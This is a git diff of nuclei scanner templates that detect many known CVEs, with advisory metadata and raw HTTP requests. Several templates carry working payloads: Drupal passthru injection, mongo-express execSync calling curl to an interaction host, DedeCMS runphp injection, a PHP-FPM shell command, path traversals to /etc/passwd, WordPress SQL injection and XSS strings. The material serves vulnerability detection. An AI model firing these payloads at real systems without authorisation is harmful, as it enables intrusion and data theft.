severity: critical - description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + impact: | + Remote attackers can execute arbitrary code on the affected Drupal installations. + remediation: | + Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 - tags: cve,cve2018,drupal,authenticated + - https://www.drupal.org/sa-core-2018-004 + - https://www.exploit-db.com/exploits/44557/ + - http://www.securitytracker.com/id/1040754 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-7602 + epss-score: 0.97448 + epss-percentile: 0.99947 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + vendor: drupal + product: drupal + shodan-query: http.component:"drupal" + tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb -requests: +http: - raw: - | POST /?q=user%2Flogin HTTP/1.1 @@ -21,18 +37,15 @@ requests: Content-Type: application/x-www-form-urlencoded form_id=user_login&name={{username}}&pass={{password}}&op=Log+in - - | GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 Host: {{Hostname}} - - | POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account - - | POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 Host: {{Hostname}} @@ -40,8 +53,7 @@ requests: form_build_id={{form_build_id}} - cookie-reuse: true - redirects: true + host-redirects: true max-redirects: 2 matchers: - type: word @@ -50,25 +62,26 @@ requests: extractors: - type: regex - part: body name: userid - internal: true group: 1 regex: - '' + internal: true + part: body - type: regex - part: body name: form_build_id - internal: true group: 1 regex: - '' + internal: true + part: body +# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-7662.yaml b/nuclei-templates/CVE-2018/cve-2018-7662.yaml index eb56470249..4296c733cd 100644 --- a/nuclei-templates/CVE-2018/cve-2018-7662.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-7662.yaml @@ -1,25 +1,42 @@ id: CVE-2018-7662 info: - name: CouchCMS Full Path Disclosure + name: CouchCMS <= 2.0 - Path Disclosure author: ritikchaddha severity: medium - description: phpmailer.php and mysql2i.func.php disclosure the full path - reference: https://github.com/CouchCMS/CouchCMS/issues/46 - tags: couchcms,fpd,cve,cve2018 + description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. + impact: | + An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks. + remediation: | + Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. + reference: + - https://github.com/CouchCMS/CouchCMS/issues/46 + - https://nvd.nist.gov/vuln/detail/CVE-2018-7662 + - https://github.com/20142995/Goby + - https://github.com/5ecurity/CVE-List + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-7662 cwe-id: CWE-200 + epss-score: 0.00292 + epss-percentile: 0.65908 + cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: couchcms + product: couch + tags: cve2018,cve,couchcms,fpd -requests: +http: - method: GET path: - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" - "{{BaseURL}}/addons/phpmailer/phpmailer.php" stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -35,3 +52,4 @@ requests: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and +# digest: 490a0046304402207bc6bc4a86c8bf73bc4bc1fe83c3fb63108f1b1b77ac110b33a6af75a7a3a8ad02203036732893f9ba2208c741cd3a825d7d73f9870d11029f0c14d7098e0bc302cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-7700.yaml b/nuclei-templates/CVE-2018/cve-2018-7700.yaml new file mode 100644 index 0000000000..32b525bf7f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7700.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-7700 + +info: + name: DedeCMS V5.7SP2 RCE + author: pikpikcu + severity: high + reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." + +requests: + - method: GET + path: + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + + matchers-condition: and + matchers: + + - type: word + words: + - "phpinfo" + - "PHP Version" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-8006.yaml b/nuclei-templates/CVE-2018/cve-2018-8006.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8006.yaml rename to nuclei-templates/CVE-2018/cve-2018-8006.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-8727.yaml b/nuclei-templates/CVE-2018/cve-2018-8727.yaml new file mode 100644 index 0000000000..b537efb4ad --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-8727.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-8727 + +info: + name: Mirasys DVMS Workstation 5.12.6 Path Traversal + author: 0x_akoko + severity: high + description: Mirasys DVMS Workstation versions 5.12.6 and below suffer from a path traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html + - https://www.cvedetails.com/cve/CVE-2018-8727 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-8727 + cwe-id: CWE-22 + tags: cve,cve2018,mirasys,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-9161.yaml b/nuclei-templates/CVE-2018/cve-2018-9161.yaml deleted file mode 100644 index 5db121e528..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-9161.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-9161 - -info: - name: PrismaWEB - Credentials Disclosure - author: gy741 - severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - tags: cve,cve2018,prismaweb,exposure - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-9161 - cwe-id: CWE-798 - -requests: - - method: GET - path: - - "{{BaseURL}}/user/scripts/login_par.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'txtChkUser' - - 'txtChkPassword' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-9845.yaml b/nuclei-templates/CVE-2018/cve-2018-9845.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9845.yaml rename to nuclei-templates/CVE-2018/cve-2018-9845.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-0193.yaml b/nuclei-templates/CVE-2019/CVE-2019-0193.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0193.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0193.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-0221.yaml b/nuclei-templates/CVE-2019/CVE-2019-0221.yaml index 4bc1cd99b6..d70ad0f864 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-0221.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-0221.yaml @@ -1,38 +1,43 @@ id: CVE-2019-0221 + info: name: Apache Tomcat XSS author: pikpikcu severity: medium + reference: + - https://seclists.org/fulldisclosure/2019/May/50 + - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ + - https://www.exploit-db.com/exploits/50119 description: | The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. - reference: - - https://seclists.org/fulldisclosure/2019/May/50 - - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - - https://www.exploit-db.com/exploits/50119 - - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E + tags: cve,cve2019,apache,xss,tomcat classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2019-0221 cwe-id: CWE-79 - tags: cve,cve2019,apache,xss,tomcat + requests: - method: GET path: - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" + matchers-condition: and matchers: + - type: word words: - "" + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-0230.yaml b/nuclei-templates/CVE-2019/CVE-2019-0230.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0230.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0230.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10098.yaml b/nuclei-templates/CVE-2019/CVE-2019-10098.yaml index 6874b9e1e8..b71e1cd822 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-10098.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-10098.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Upgrade Apache HTTP server to version 2.4.40 or later to mitigate this vulnerability. reference: @@ -21,7 +23,7 @@ info: cve-id: CVE-2019-10098 cwe-id: CWE-601 epss-score: 0.10593 - epss-percentile: 0.94461 + epss-percentile: 0.94527 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100fa28d6e933c4a020b46e35b2bcf6d248a2afe81e491e3d75349936ec37ff330702203b9b6c78898a9cb646e032eec281de85172b5de2ba972a9713afa155fa28f2a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d5acc648046711517cfb9e2cf0cdb4c15233662233ff46aef2ea399f5a42f3b02204bbcd1901f2966465782ae4bb1a89811265aa66156c599bfd42c96706453fa92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml b/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml deleted file mode 100644 index b1afc71348..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2019-1010287 -info: - name: Timesheet 1.5.3 - Cross Site Scripting - author: pikpikcu - severity: medium - description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - - http://www.mdh-tz.info/ - - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ - - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-1010287 - cwe-id: CWE-79 - metadata: - google-dork: inurl:"/timesheet/login.php" - tags: cve,cve2019,timesheet,xss -requests: - - raw: - - | - POST /timesheet/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '>' - part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-10405.yaml b/nuclei-templates/CVE-2019/CVE-2019-10405.yaml index 805745fd9a..94189434f2 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-10405.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-10405.yaml @@ -1,22 +1,35 @@ id: CVE-2019-10405 + info: - name: Diagnostic page exposed Cookie HTTP header + name: Jenkins <=2.196 - Cookie Exposure author: c-sh0 severity: medium - description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL + description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue. + impact: | + The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches. + remediation: | + Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-10405 - https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505 - http://www.openwall.com/lists/oss-security/2019/09/25/3 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10405 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2019-10405 - cwe-id: CWE-200 + cwe-id: CWE-79 + epss-score: 0.00572 + epss-percentile: 0.77427 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: + max-request: 2 + vendor: jenkins + product: jenkins shodan-query: http.favicon.hash:81586312 tags: cve,cve2019,jenkins -requests: + +http: - raw: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 @@ -24,27 +37,30 @@ requests: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - 'text/html' - 'x-jenkins' - condition: and case-insensitive: true + condition: and + - type: word part: body_2 words: - 'Cookie' - 'JSESSIONID' condition: and + + - type: status + status: + - 200 + extractors: - type: kval kval: - x_jenkins +# digest: 4a0a00473045022100d3c00480594e335316512607e1730e0f4b99e755cd744fc506c049036dbe4696022000afd5caaf07abf1dbe8d051503772a11975ed7d5bd15940e71c63a569ad63bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-10475.yaml b/nuclei-templates/CVE-2019/CVE-2019-10475.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-10475.yaml rename to nuclei-templates/CVE-2019/CVE-2019-10475.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10692.yaml b/nuclei-templates/CVE-2019/CVE-2019-10692.yaml index 085a48b4e0..66751d09e7 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-10692.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-10692.yaml @@ -1,29 +1,22 @@ id: CVE-2019-10692 - info: - name: WordPress Google Maps <7.11.18 - SQL Injection + name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection author: pussycat0x severity: critical description: | - WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + In the wp-google-maps plugin before 7.11.18 for WordPress, + includes/class.rest-api.php in the REST API does not sanitize field names + before a SELECT statement. reference: - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea - - https://wordpress.org/plugins/wp-google-maps/#developers - - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-10692 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan + verified: true + tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps requests: - method: GET path: - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" - matchers-condition: and matchers: - type: word @@ -33,14 +26,10 @@ requests: - '"user_pass"' - '"user_nicename"' condition: and - - type: word part: header words: - application/json - - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10717.yaml b/nuclei-templates/CVE-2019/CVE-2019-10717.yaml deleted file mode 100644 index 39980665a1..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-10717.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2019-10717 - -info: - name: BlogEngine.NET 3.3.7.0 - Local File Inclusion - author: arafatansari - severity: high - description: | - BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter - reference: - - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect - - https://github.com/rxtur/BlogEngine.NET/commits/master - - https://nvd.nist.gov/vuln/detail/CVE-2019-10717 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N - cvss-score: 7.1 - cve-id: CVE-2019-10717 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Blogengine.net" - verified: "true" - tags: cve,cve2019,blogengine,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent" - - matchers-condition: and - matchers: - - type: regex - regex: - - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)' - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10758.yaml b/nuclei-templates/CVE-2019/CVE-2019-10758.yaml new file mode 100644 index 0000000000..92d6c6e83f --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-10758.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-10758 + +info: + name: mongo-express Remote Code Execution + author: princechaddha + severity: critical + description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Upgrade mongo-express to version 0.54.0 or higher. + reference: + - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 + - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 + - https://github.com/CLincat/vulcat + - https://github.com/MelanyRoob/Goby + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2019-10758 + epss-score: 0.97429 + epss-percentile: 0.99934 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* + metadata: + max-request: 1 + vendor: mongo-express_project + product: mongo-express + framework: node.js + shodan-query: http.title:"Mongo Express" + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js + +http: + - raw: + - | + POST /checkValid HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46cGFzcw== + Content-Type: application/x-www-form-urlencoded + + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-11013.yaml b/nuclei-templates/CVE-2019/CVE-2019-11013.yaml deleted file mode 100644 index 572e46e66a..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-11013.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-11013 -info: - name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal - author: 0x_Akoko - severity: medium - description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server. - reference: - - https://www.exploit-db.com/exploits/47301 - - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 - - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ - - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2019-11013 - cwe-id: CWE-22 - tags: cve,cve2019,lfi,nimble -requests: - - method: GET - path: - - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11043.yaml b/nuclei-templates/CVE-2019/CVE-2019-11043.yaml new file mode 100644 index 0000000000..44c98d37a7 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-11043.yaml @@ -0,0 +1,18 @@ +id: cve-2019-11043 + +info: + name: PHP-FPM & nginx RCE + author: geeknik + severity: high + description: https://github.com/neex/phuip-fpizdam + +requests: + - method: GET + path: + - "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&" + + matchers: + - type: word + words: + - "/bin/which" + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-12276.yaml b/nuclei-templates/CVE-2019/CVE-2019-12276.yaml index c59ef768ea..a0cc848279 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-12276.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-12276.yaml @@ -1,34 +1,34 @@ -id: CVE-2019-12276 - -info: - name: GrandNode 4.40 - Path Traversal - author: daffainfo - severity: high - description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. - reference: - - https://security401.com/grandnode-path-traversal/ - - https://www.cvedetails.com/cve/CVE-2019-12276 - tags: cve,cve2019,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2019-12276 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" - headers: - Connection: close - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 +id: CVE-2019-12276 + +info: + name: GrandNode 4.40 - Path Traversal + author: daffainfo + severity: high + description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. + reference: + - https://security401.com/grandnode-path-traversal/ + - https://www.cvedetails.com/cve/CVE-2019-12276 + tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" + headers: + Connection: close + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-12314.yaml b/nuclei-templates/CVE-2019/CVE-2019-12314.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-12314.yaml rename to nuclei-templates/CVE-2019/CVE-2019-12314.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml b/nuclei-templates/CVE-2019/CVE-2019-12581.yaml deleted file mode 100644 index ed07cdfb22..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-12581 - -info: - name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting - author: n-thumann - severity: medium - description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. - reference: - - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ - - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12581 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ZyWall" - tags: cve,cve2019,zyxel,zywall,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/free_time_failed.cgi?err_msg=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Please contact with administrator." - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml b/nuclei-templates/CVE-2019/CVE-2019-12616.yaml deleted file mode 100644 index 4c6728395f..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-12616 -info: - name: phpMyAdmin < 4.9.0 - CSRF - author: Mohammedsaneem,philippedelteil,daffainfo - severity: medium - description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the 